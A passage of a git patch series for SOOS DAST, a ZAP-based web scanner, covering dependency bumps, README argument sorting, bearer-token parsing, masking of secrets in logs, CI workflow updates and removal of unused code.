-      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.9.tgz",
-      "integrity": "sha512-jK79S/e+D3eKjndf9avqN9XC1ustI4ZUMDEDVIs5+8agWw7YOcqYfx4yNehXX1Te67KSNscNQYdpntoRXSgtag==",
+      "version": "0.1.5",
+      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5.tgz",
+      "integrity": "sha512-H2fZqV+cm+Q5HCpuwY+DwTq9fJHPVzPoTG8h+QW1DzV11OVESUamnQW7Tlbe6VkoGA72mQTdaHlSO6kCC4I6uw==",
       "dependencies": {
         "axios": "^0.27.2",
         "tslib": "^2.6.2"
diff --git a/package.json b/package.json
index d9baab0..4614fe1 100644
--- a/package.json
+++ b/package.json
@@ -17,7 +17,7 @@
     "check": "npm run format && npm run typecheck && npm run test"
   },
   "dependencies": {
-    "@soos-io/api-client": "0.1.5-pre.9",
+    "@soos-io/api-client": "0.1.5",
     "argparse": "^2.0.1",
     "axios": "^0.27.2",
     "tslib": "^2.6.2",
diff --git a/src/index.ts b/src/index.ts
index 9def173..f76ce06 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -78,7 +78,7 @@ class SOOSDASTAnalysis {
     const parser = new ArgumentParser({ description: "SOOS DAST" });
 
     parser.add_argument("--ajaxSpider", {
-      help: "Enable Ajax Spider.",
+      help: "Ajax Spider - Use the ajax spider in addition to the traditional one. Additional information: https://www.zaproxy.org/docs/desktop/addons/ajax-spider/.",
       action: "store_true",
       required: false,
     });

From f42ea1918fd0573f9b67752f37661d55e694f596 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 15:34:03 -0300
Subject: [PATCH 13/26] alphabetically sort params on readme

---
 README.md | 59 +++++++++++++++++++++++++++----------------------------
 1 file changed, 29 insertions(+), 30 deletions(-)

diff --git a/README.md b/README.md
index 9e398be..293f989 100644
--- a/README.md
+++ b/README.md
@@ -31,48 +31,47 @@ The basic command to run a baseline scan would look like:
 
 | Argument | Default | Description |
 | --- | --- | --- |
-| `-h`, `--help` | ==SUPPRESS== | show this help message and exit |
-| `--clientId` | None | SOOS Client ID - get yours from https://app.soos.io/integrate/sca |
-| `--apiKey` | None | SOOS API Key - get yours from https://app.soos.io/integrate/sca |
-| `--projectName` | None | Project Name - this is what will be displayed in the SOOS app |
-| `--scanMode` | baseline | Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes) |
-| `--debug` | False | Enable debug logging for ZAP. |
 | `--ajaxSpider` | None | Ajax Spider - Use the ajax spider in addition to the traditional one. Additional information: https://www.zaproxy.org/docs/desktop/addons/ajax-spider/ |
-| `--contextFile` | None | Context file which will be loaded prior to scanning the target |
-| `--fullScanMinutes` | None | Number of minutes for the spider to run |
-| `--apiScanFormat` | None | Target API format: OpenAPI, SOAP, or GraphQL |
-| `--integrationName` | None | Integration Name - Intended for internal use only. |
-| `--integrationType` | None | Integration Type - Intended for internal use only. |
-| `--scriptVersion` | None | Script Version - Intended for internal use only. |
+| `--apiKey` | None | SOOS API Key - get yours from https://app.soos.io/integrate/sca |
 | `--appVersion` | None | App Version - Intended for internal use only. |
-| `--authUsername` | None | Username to use in auth apps |
-| `--authPassword` | None | Password to use in auth apps |
+| `--authDelayTime` | 5 | Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page) |
+| `--authFormType` | simple | simple (all fields are displayed at once), wait_for_password (Password field is displayed only after username is filled), or multi_page (Password field is displayed only after username is filled and submit is clicked) |
 | `--authLoginURL` | None | Login url to use in auth apps |
-| `--authUsernameField` | None | Username input id to use in auth apps |
+| `--authPassword` | None | Password to use in auth apps |
 | `--authPasswordField` | None | Password input id to use in auth apps |
-| `--authSubmitField` | None | Submit button id to use in auth apps |
 | `--authSecondSubmitField` | None | Second submit button id to use in auth apps (for multi-page forms) |
-| `--authFormType` | simple | simple (all fields are displayed at once), wait_for_password (Password field is displayed only after username is filled), or multi_page (Password field is displayed only after username is filled and submit is clicked) |
-| `--authDelayTime` | 5 | Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page) 
 | `--authSubmitAction` | None | Submit action to perform on form filled. Options: click or submit |
-| `--zapOptions` | None | Additional ZAP Options |
-| `--requestCookies` | None | Set Cookie values for the requests to the target URL |
-| `--requestHeaders` | None | Set extra Header requests |
-| `--onFailure` | continue_on_failure | Action to perform when the scan fails. Options: fail_the_build, continue_on_failure |
-| `--commitHash` | None | The commit hash value from the SCM System |
+| `--authSubmitField` | None | Submit button id to use in auth apps |
+| `--authUsername` | None | Username to use in auth apps |
+| `--authUsernameField` | None | Username input id to use in auth apps |
+| `--bearerToken` | None | Bearer token to authenticate |
 | `--branchName` | None | The name of the branch from the SCM System |
 | `--branchURI` | None | The URI to the branch from the SCM System |
-| `--buildVersion` | None | Version of application build artifacts |
 | `--buildURI` | None | URI to CI build info |
-| `--operatingEnvironment` | None | Set Operating environment for information purposes only |
-| `--reportRequestHeaders` | True | Include request/response headers data in report |
-| `--outputFormat` | None | Output format for vulnerabilities: only the value SARIF is available at the moment |
-| `--bearerToken` | None | Bearer token to authenticate |
+| `--buildVersion` | None | Version of application build artifacts |
 | `--checkoutDir` | None | Checkout directory to locate SARIF report |
-| `--oauthTokenUrl` | None | The authentication URL that grants the access_token. |
-| `--oauthParameters` | None | Parameters to be added to the oauth token request. (eg --oauthParameters="client_id:clientID, client_secret:clientSecret, grant_type:client_credentials")
+| `--clientId` | None | SOOS Client ID - get yours from https://app.soos.io/integrate/sca |
+| `--commitHash` | None | The commit hash value from the SCM System |
+| `--contextFile` | None | Context file which will be loaded prior to scanning the target |
+| `--debug` | False | Enable debug logging for ZAP. |
 | `--disableRules` | None | Comma separated list of ZAP rules IDs to disable. List for reference https://www.zaproxy.org/docs/alerts/ |
+| `--fullScanMinutes` | None | Number of minutes for the spider to run |
+| `--help`, `-h` | ==SUPPRESS== | show this help message and exit |
+| `--integrationName` | None | Integration Name - Intended for internal use only. |
+| `--integrationType` | None | Integration Type - Intended for internal use only. |
+| `--oauthParameters` | None | Parameters to be added to the oauth token request. (eg --oauthParameters="client_id:clientID, client_secret:clientSecret, grant_type:client_credentials") |
+| `--oauthTokenUrl` | None | The authentication URL that grants the access_token. |
+| `--onFailure` | continue_on_failure | Action to perform when the scan fails. Options: fail_the_build, continue_on_failure |
+| `--operatingEnvironment` | None | Set Operating environment for information purposes only |
 | `--otherOptions` | None | Additional command line arguments for items not supported by the set of parameters above |
+| `--outputFormat` | None | Output format for vulnerabilities: only the value SARIF is available at the moment |
+| `--projectName` | None | Project Name - this is what will be displayed in the SOOS app |
+| `--reportRequestHeaders` | True | Include request/response headers data in report |
+| `--requestCookies` | None | Set Cookie values for the requests to the target URL |
+| `--requestHeaders` | None | Set extra Header requests |
+| `--scanMode` | baseline | Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes) |
+| `--scriptVersion` | None | Script Version - Intended for internal use only. |
+| `--zapOptions` | None | Additional ZAP Options |
 
 ## Scan Modes
 

From 47a06b4966db1dc614ffb843ebb85c7092f32a36 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 09:25:20 -0300
Subject: [PATCH 14/26] update login_from_token_endpoint

---
 src/zap_hooks/helpers/auth_context.py | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/src/zap_hooks/helpers/auth_context.py b/src/zap_hooks/helpers/auth_context.py
index 5e755d1..3445837 100644
--- a/src/zap_hooks/helpers/auth_context.py
+++ b/src/zap_hooks/helpers/auth_context.py
@@ -176,6 +176,10 @@ def login_from_token_endpoint(zap, config):
         auth_header = f"Bearer {data['token']}"
     elif "token_type" in data:
         auth_header = f"{data['token_type']} {data['token_type']}"
+    elif "access" in data:
+            auth_header = f"Bearer {data['access']}"
+    else:
+        raise Exception(f"Unhandled auth response: {str(data)}" )
 
     if auth_header:
         add_authorization_header(zap, auth_header)

From 2e3de610a7484bc7315e6b36a8958416d3f5fe29 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 10:08:57 -0300
Subject: [PATCH 15/26] obfuscate sensitive data on param print

---
 src/index.ts | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/src/index.ts b/src/index.ts
index f76ce06..155506f 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -10,6 +10,7 @@ import {
   isUrlAvailable,
   convertStringToBase64,
   sleep,
+  obfuscateProperties,
 } from "@soos-io/api-client/dist/utilities";
 import {
   ScanStatus,
@@ -603,7 +604,17 @@ class SOOSDASTAnalysis {
       soosLogger.setMinLogLevel(args.logLevel);
       soosLogger.setVerbose(args.verbose);
       soosLogger.info("Configuration read");
-      soosLogger.verboseDebug(args);
+      soosLogger.verboseDebug(
+        JSON.stringify(
+          obfuscateProperties(args as unknown as Record<string, unknown>, [
+            "apiKey",
+            "authPassword",
+            "bearerToken",
+          ]),
+          null,
+          2
+        )
+      );
       soosLogger.logLineSeparator();
       const soosDASTAnalysis = new SOOSDASTAnalysis(args);
       await soosDASTAnalysis.runAnalysis();

From 62ca1fb24a7890f6f9420ed495a770cd2c114ee8 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 10:18:52 -0300
Subject: [PATCH 16/26] added action for test

---
 .github/workflows/soos-dast-test.yml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 .github/workflows/soos-dast-test.yml

diff --git a/.github/workflows/soos-dast-test.yml b/.github/workflows/soos-dast-test.yml
new file mode 100644
index 0000000..2b1f776
--- /dev/null
+++ b/.github/workflows/soos-dast-test.yml
@@ -0,0 +1,20 @@
+name: Build and Test Docker Image
+
+on:
+  pull_request: {}
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v2
+      - name: Build and Test Docker Image
+        uses: docker/build-push-action@v2
+        with:
+          context: .
+          file: ./Dockerfile
+          push: false
+          tags: soosio/dast:${{ github.sha }}
+      - name: Run Tests
+        run: |
+          docker run -it soosio/dast:${{ github.sha }} --clientId=${{secrets.SOOS_CLIENT_ID}} --apiKey=${{secrets.SOOS_API_KEY}} --apiURL="https://dev-api.soos.io/api/" --projectName="soos-dast" https://soos.io
\ No newline at end of file

From d2a155102e5628355196d2f834f231fe2b52bcd5 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 10:26:37 -0300
Subject: [PATCH 17/26] fix test, added typescript to codeql

---
 .github/workflows/codeql-analysis.yml | 2 +-
 .github/workflows/soos-dast-test.yml  | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
index db6e722..12a47f0 100644
--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -21,7 +21,7 @@ jobs:
     strategy:
       fail-fast: false
       matrix:
-        language: [ 'python' ]
+        language: [ 'python', 'typescript' ]
         # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support
 
     steps:
diff --git a/.github/workflows/soos-dast-test.yml b/.github/workflows/soos-dast-test.yml
index 2b1f776..f080581 100644
--- a/.github/workflows/soos-dast-test.yml
+++ b/.github/workflows/soos-dast-test.yml
@@ -17,4 +17,4 @@ jobs:
           tags: soosio/dast:${{ github.sha }}
       - name: Run Tests
         run: |
-          docker run -it soosio/dast:${{ github.sha }} --clientId=${{secrets.SOOS_CLIENT_ID}} --apiKey=${{secrets.SOOS_API_KEY}} --apiURL="https://dev-api.soos.io/api/" --projectName="soos-dast" https://soos.io
\ No newline at end of file
+          docker run soosio/dast:${{ github.sha }} --clientId=${{secrets.SOOS_CLIENT_ID}} --apiKey=${{secrets.SOOS_API_KEY}} --apiURL="https://dev-api.soos.io/api/" --projectName="soos-dast" https://soos.io
\ No newline at end of file

From ff8ca3b347ce2466573096ec87e88a6029ada8f7 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 10:38:15 -0300
Subject: [PATCH 18/26] removed stuff without reference from the hook

---
 src/zap_hooks/helpers/utilities.py            | 27 -------------------
 .../model/target_availability_check.py        | 27 -------------------
 2 files changed, 54 deletions(-)
 delete mode 100644 src/zap_hooks/model/target_availability_check.py

diff --git a/src/zap_hooks/helpers/utilities.py b/src/zap_hooks/helpers/utilities.py
index 34f1183..39066b2 100644
--- a/src/zap_hooks/helpers/utilities.py
+++ b/src/zap_hooks/helpers/utilities.py
@@ -1,15 +1,9 @@
 from sys import exit
 from typing import Dict, Iterable, NoReturn
 
-from requests import Response
-from requests.exceptions import HTTPError
-
 import src.zap_hooks.helpers.constants as Constants
 from src.zap_hooks.model.log_level import LogLevel, loggerFunc
-from src.zap_hooks.model.target_availability_check import TargetAvailabilityCheck
-
 
-UTF_8: str = 'utf-8'
 
 def log(message: str, log_level: LogLevel = LogLevel.INFO) -> None:
     logFunc = loggerFunc.get(log_level)
@@ -21,32 +15,11 @@ def print_line_separator() -> None:
         "----------------------------------------------------------------------------------------------------------"
     )
 
-
 def exit_app(e) -> NoReturn:
     log(str(e), LogLevel.ERROR)
     exit(1)
 
 
-def _check_status(response: Response) -> TargetAvailabilityCheck:
-    try:
-        response.raise_for_status()
-    except HTTPError as error:
-        log(f"{type(error).__name__}: {response.status_code}")
-        log(response.text, log_level=LogLevel.DEBUG)
-
-        # 401 status indicates the host is available but may be behind basic auth
-        if response.status_code == 401:
-            return TargetAvailabilityCheck(True, response=response)
-
-        return TargetAvailabilityCheck(
-            False,
-            response=response,
-            unavailable_reason=error,
-        )
-    else:
-        return TargetAvailabilityCheck(True, response=response)
-
-
 def process_custom_cookie_header_data(data: str) -> Dict:
     values: Dict = dict()
 
diff --git a/src/zap_hooks/model/target_availability_check.py b/src/zap_hooks/model/target_availability_check.py
deleted file mode 100644
index 26b1b5e..0000000
--- a/src/zap_hooks/model/target_availability_check.py
+++ /dev/null
@@ -1,27 +0,0 @@
-from typing import Optional
-
-from requests import Response, RequestException
-
-
-class TargetAvailabilityCheck:
-    def __init__(
-        self,
-        is_available: bool,
-        response: Optional[Response] = None,
-        unavailable_reason: Optional[RequestException] = None,
-    ):
-        self._is_available = is_available
-        self._response = response
-        self._unavailable_reason = unavailable_reason
-
-    def status_code(self) -> Optional[int]:
-        if self._response is not None:
-            return self._response.status_code
-
-        return None
-
-    def is_available(self) -> bool:
-        return self._is_available
-
-    def unavailable_reason(self) -> Optional[RequestException]:
-        return self._unavailable_reason

From 601dfbaeacd2b30e225ca8c064c181551923eb6a Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 11:14:08 -0300
Subject: [PATCH 19/26] rename python files to snake_case

---
 src/zap_hooks/helpers/auth_context.py                           | 2 +-
 src/zap_hooks/helpers/{blindxss.py => blind_xss.py}             | 0
 src/zap_hooks/helpers/{browserstorage.py => browser_storage.py} | 0
 src/zap_hooks/helpers/requestheaders.py                         | 0
 4 files changed, 1 insertion(+), 1 deletion(-)
 rename src/zap_hooks/helpers/{blindxss.py => blind_xss.py} (100%)
 rename src/zap_hooks/helpers/{browserstorage.py => browser_storage.py} (100%)
 delete mode 100644 src/zap_hooks/helpers/requestheaders.py

diff --git a/src/zap_hooks/helpers/auth_context.py b/src/zap_hooks/helpers/auth_context.py
index 3445837..c60f228 100644
--- a/src/zap_hooks/helpers/auth_context.py
+++ b/src/zap_hooks/helpers/auth_context.py
@@ -16,7 +16,7 @@
 import zap_common
 import logging
 
-from src.zap_hooks.helpers.browserstorage import BrowserStorage
+from src.zap_hooks.helpers.browser_storage import BrowserStorage
 from src.zap_hooks.helpers.utilities import array_to_dict, log
 from src.zap_hooks.model.log_level import LogLevel
 from src.zap_hooks.helpers.logging import LoggingFilter
diff --git a/src/zap_hooks/helpers/blindxss.py b/src/zap_hooks/helpers/blind_xss.py
similarity index 100%
rename from src/zap_hooks/helpers/blindxss.py
rename to src/zap_hooks/helpers/blind_xss.py
diff --git a/src/zap_hooks/helpers/browserstorage.py b/src/zap_hooks/helpers/browser_storage.py
similarity index 100%
rename from src/zap_hooks/helpers/browserstorage.py
rename to src/zap_hooks/helpers/browser_storage.py
diff --git a/src/zap_hooks/helpers/requestheaders.py b/src/zap_hooks/helpers/requestheaders.py
deleted file mode 100644
index e69de29..0000000

From 4cc816c8960f6ae91b4b9a30656411a6c00376a6 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 11:20:24 -0300
Subject: [PATCH 20/26] npm outdated on check, removed tests, more unused utils

---
 package.json                       | 4 ++--
 src/zap_hooks/helpers/utilities.py | 5 -----
 src/zap_hooks/soos_zap_hook.py     | 1 -
 3 files changed, 2 insertions(+), 8 deletions(-)

diff --git a/package.json b/package.json
index 4614fe1..5da1927 100644
--- a/package.json
+++ b/package.json
@@ -13,8 +13,8 @@
     "format": "prettier ./src --check",
     "format:fix": "prettier ./src --write",
     "typecheck": "tsc --noEmit",
-    "test:coverage": "npm run test -- --reporter xunit --reporter-option output=ResultsFile.xml",
-    "check": "npm run format && npm run typecheck && npm run test"
+    "check": "npm run format && npm run typecheck && npm outdate",
+    "outdated": "npm outdated"
   },
   "dependencies": {
     "@soos-io/api-client": "0.1.5",
diff --git a/src/zap_hooks/helpers/utilities.py b/src/zap_hooks/helpers/utilities.py
index 39066b2..1d863dd 100644
--- a/src/zap_hooks/helpers/utilities.py
+++ b/src/zap_hooks/helpers/utilities.py
@@ -10,11 +10,6 @@ def log(message: str, log_level: LogLevel = LogLevel.INFO) -> None:
     logFunc(str(message))
 
 
-def print_line_separator() -> None:
-    print(
-        "----------------------------------------------------------------------------------------------------------"
-    )
-
 def exit_app(e) -> NoReturn:
     log(str(e), LogLevel.ERROR)
     exit(1)
diff --git a/src/zap_hooks/soos_zap_hook.py b/src/zap_hooks/soos_zap_hook.py
index ce16c26..07bdec8 100644
--- a/src/zap_hooks/soos_zap_hook.py
+++ b/src/zap_hooks/soos_zap_hook.py
@@ -50,7 +50,6 @@ def zap_started(zap, target):
         headers.load(config, zap)
     except Exception:
         exit_app(f"error in zap_started: {traceback.print_exc()}")
-        sys.exit(1)
 
     return zap, target
 

From befa03386a38e5c3896e2e48d524642eb73d2e80 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 11:43:59 -0300
Subject: [PATCH 21/26] access token instead of token_type

---
 src/zap_hooks/helpers/auth_context.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/zap_hooks/helpers/auth_context.py b/src/zap_hooks/helpers/auth_context.py
index c60f228..37c8524 100644
--- a/src/zap_hooks/helpers/auth_context.py
+++ b/src/zap_hooks/helpers/auth_context.py
@@ -175,7 +175,7 @@ def login_from_token_endpoint(zap, config):
     if "token" in data:
         auth_header = f"Bearer {data['token']}"
     elif "token_type" in data:
-        auth_header = f"{data['token_type']} {data['token_type']}"
+        auth_header = f"{data['token_type']} {data['access_token']}"
     elif "access" in data:
             auth_header = f"Bearer {data['access']}"
     else:

From 5427d72933e564587198a6d477bd2d6087386fa9 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 11:55:28 -0300
Subject: [PATCH 22/26] upgrade actions

---
 .github/workflows/soos-dast-docker-image-alpha.yml  | 6 +++---
 .github/workflows/soos-dast-docker-image-beta.yml   | 6 +++---
 .github/workflows/soos-dast-docker-image-latest.yml | 6 +++---
 .github/workflows/soos-dast-publish-aws-ecr.yml     | 2 +-
 .github/workflows/soos-dast-test.yml                | 4 ++--
 5 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/.github/workflows/soos-dast-docker-image-alpha.yml b/.github/workflows/soos-dast-docker-image-alpha.yml
index 704d984..f3fcbec 100644
--- a/.github/workflows/soos-dast-docker-image-alpha.yml
+++ b/.github/workflows/soos-dast-docker-image-alpha.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
       - name: Docker meta
         id: meta
         uses: docker/metadata-action@v3
@@ -18,12 +18,12 @@ jobs:
           images: soosio/dast
       - name: Login to DockerHub
         if: github.event_name != 'pull_request'
-        uses: docker/login-action@v1
+        uses: docker/login-action@v3
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}
       - name: Build and Push
-        uses: docker/build-push-action@v2
+        uses: docker/build-push-action@v5
         with:
           context: .
           push: ${{ github.event_name != 'pull_request' }}
diff --git a/.github/workflows/soos-dast-docker-image-beta.yml b/.github/workflows/soos-dast-docker-image-beta.yml
index 1b6a6d9..37bfa84 100644
--- a/.github/workflows/soos-dast-docker-image-beta.yml
+++ b/.github/workflows/soos-dast-docker-image-beta.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
       - name: Docker meta
         id: meta
         uses: docker/metadata-action@v3
@@ -18,12 +18,12 @@ jobs:
           images: soosio/dast
       - name: Login to DockerHub
         if: github.event_name != 'pull_request'
-        uses: docker/login-action@v1
+        uses: docker/login-action@v3
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}
       - name: Build and Push
-        uses: docker/build-push-action@v2
+        uses: docker/build-push-action@v5
         with:
           context: .
           push: ${{ github.event_name != 'pull_request' }}
diff --git a/.github/workflows/soos-dast-docker-image-latest.yml b/.github/workflows/soos-dast-docker-image-latest.yml
index 32e8245..505d0d9 100644
--- a/.github/workflows/soos-dast-docker-image-latest.yml
+++ b/.github/workflows/soos-dast-docker-image-latest.yml
@@ -9,7 +9,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
       - name: Docker meta
         id: meta
         uses: docker/metadata-action@v3
@@ -17,12 +17,12 @@ jobs:
           images: soosio/dast
       - name: Login to DockerHub
         if: github.event_name != 'pull_request'
-        uses: docker/login-action@v1
+        uses: docker/login-action@v3
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}
       - name: Build and Push
-        uses: docker/build-push-action@v2
+        uses: docker/build-push-action@v5
         with:
           context: .
           push: ${{ github.event_name != 'pull_request' }}
diff --git a/.github/workflows/soos-dast-publish-aws-ecr.yml b/.github/workflows/soos-dast-publish-aws-ecr.yml
index a22df8a..0581959 100644
--- a/.github/workflows/soos-dast-publish-aws-ecr.yml
+++ b/.github/workflows/soos-dast-publish-aws-ecr.yml
@@ -10,7 +10,7 @@ jobs:
 
     steps:
     - name: Check out code
-      uses: actions/checkout@v2
+      uses: actions/checkout@v4
 
     - name: Configure AWS credentials
       id: login-ecr
diff --git a/.github/workflows/soos-dast-test.yml b/.github/workflows/soos-dast-test.yml
index f080581..874bf1a 100644
--- a/.github/workflows/soos-dast-test.yml
+++ b/.github/workflows/soos-dast-test.yml
@@ -7,9 +7,9 @@ jobs:
   build:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v4
       - name: Build and Test Docker Image
-        uses: docker/build-push-action@v2
+        uses: docker/build-push-action@v5
         with:
           context: .
           file: ./Dockerfile

From 3372bbd37d9da935eb4884207ac9f091593285b8 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 14:04:12 -0300
Subject: [PATCH 23/26] dump version txt use package.json version from now
 onwards

---
 VERSION.txt | 1 -
 1 file changed, 1 deletion(-)
 delete mode 100644 VERSION.txt

diff --git a/VERSION.txt b/VERSION.txt
deleted file mode 100644
index 227cea2..0000000
--- a/VERSION.txt
+++ /dev/null
@@ -1 +0,0 @@
-2.0.0

From 7fda5ed04b40d191ced2411af503463ee63af92f Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 14:07:33 -0300
Subject: [PATCH 24/26] remove zaproxy dependency

---
 package-lock.json | 29 +----------------------------
 package.json      |  3 +--
 2 files changed, 2 insertions(+), 30 deletions(-)

diff --git a/package-lock.json b/package-lock.json
index 919082c..2c37b12 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -12,8 +12,7 @@
         "@soos-io/api-client": "0.1.5",
         "argparse": "^2.0.1",
         "axios": "^0.27.2",
-        "tslib": "^2.6.2",
-        "zaproxy": "^2.0.0-rc.3"
+        "tslib": "^2.6.2"
       },
       "devDependencies": {
         "@types/argparse": "^2.0.11",
@@ -167,11 +166,6 @@
         "url": "https://github.com/prettier/prettier?sponsor=1"
       }
     },
-    "node_modules/proxy-from-env": {
-      "version": "1.1.0",
-      "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz",
-      "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg=="
-    },
     "node_modules/tslib": {
       "version": "2.6.2",
       "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz",
@@ -195,27 +189,6 @@
       "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz",
       "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==",
       "dev": true
-    },
-    "node_modules/zaproxy": {
-      "version": "2.0.0-rc.3",
-      "resolved": "https://registry.npmjs.org/zaproxy/-/zaproxy-2.0.0-rc.3.tgz",
-      "integrity": "sha512-85oymfCSGMy+QG945IgUvwxCLrs24Dci6vMLCcUtldxNEAc87lHhDO7TVfh0cZZ6y5J5ID6bdzt6Yd1QbJk8rA==",
-      "dependencies": {
-        "axios": "^1.3.3"
-      },
-      "engines": {
-        "node": ">=17.0.0"
-      }
-    },
-    "node_modules/zaproxy/node_modules/axios": {
-      "version": "1.5.1",
-      "resolved": "https://registry.npmjs.org/axios/-/axios-1.5.1.tgz",
-      "integrity": "sha512-Q28iYCWzNHjAm+yEAot5QaAMxhMghWLFVf7rRdwhUI+c2jix2DUXjAHXVi+s1ibs3mjPO/cCgbA++3BjD0vP/A==",
-      "dependencies": {
-        "follow-redirects": "^1.15.0",
-        "form-data": "^4.0.0",
-        "proxy-from-env": "^1.1.0"
-      }
     }
   }
 }
diff --git a/package.json b/package.json
index 5da1927..46ba8c9 100644
--- a/package.json
+++ b/package.json
@@ -20,8 +20,7 @@
     "@soos-io/api-client": "0.1.5",
     "argparse": "^2.0.1",
     "axios": "^0.27.2",
-    "tslib": "^2.6.2",
-    "zaproxy": "^2.0.0-rc.3"
+    "tslib": "^2.6.2"
   },
   "devDependencies": {
     "@types/argparse": "^2.0.11",

From ec9df377e5db452c6a62c9f74d022180fde4ba7d Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 14:10:42 -0300
Subject: [PATCH 25/26] code review

---
 README.md    | 18 +++++++++---------
 src/index.ts | 22 +++++++++++-----------
 2 files changed, 20 insertions(+), 20 deletions(-)

diff --git a/README.md b/README.md
index 293f989..2b91b69 100644
--- a/README.md
+++ b/README.md
@@ -32,25 +32,25 @@ The basic command to run a baseline scan would look like:
 | Argument | Default | Description |
 | --- | --- | --- |
 | `--ajaxSpider` | None | Ajax Spider - Use the ajax spider in addition to the traditional one. Additional information: https://www.zaproxy.org/docs/desktop/addons/ajax-spider/ |
-| `--apiKey` | None | SOOS API Key - get yours from https://app.soos.io/integrate/sca |
+| `--apiKey` | None | SOOS API Key - get yours from https://app.soos.io/integrate/dast |
 | `--appVersion` | None | App Version - Intended for internal use only. |
 | `--authDelayTime` | 5 | Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page) |
 | `--authFormType` | simple | simple (all fields are displayed at once), wait_for_password (Password field is displayed only after username is filled), or multi_page (Password field is displayed only after username is filled and submit is clicked) |
-| `--authLoginURL` | None | Login url to use in auth apps |
-| `--authPassword` | None | Password to use in auth apps |
-| `--authPasswordField` | None | Password input id to use in auth apps |
-| `--authSecondSubmitField` | None | Second submit button id to use in auth apps (for multi-page forms) |
+| `--authLoginURL` | None | Login url to use when authentication is required |
+| `--authPassword` | None | Password to use when authentication is required |
+| `--authPasswordField` | None | Password input id to use when authentication is required |
+| `--authSecondSubmitField` | None | Second submit button id to use when authentication is required (for multi-page forms) |
 | `--authSubmitAction` | None | Submit action to perform on form filled. Options: click or submit |
-| `--authSubmitField` | None | Submit button id to use in auth apps |
-| `--authUsername` | None | Username to use in auth apps |
-| `--authUsernameField` | None | Username input id to use in auth apps |
+| `--authSubmitField` | None | Submit button id to use when authentication is required |
+| `--authUsername` | None | Username to use when authentication is required |
+| `--authUsernameField` | None | Username input id to use when authentication is required |
 | `--bearerToken` | None | Bearer token to authenticate |
 | `--branchName` | None | The name of the branch from the SCM System |
 | `--branchURI` | None | The URI to the branch from the SCM System |
 | `--buildURI` | None | URI to CI build info |
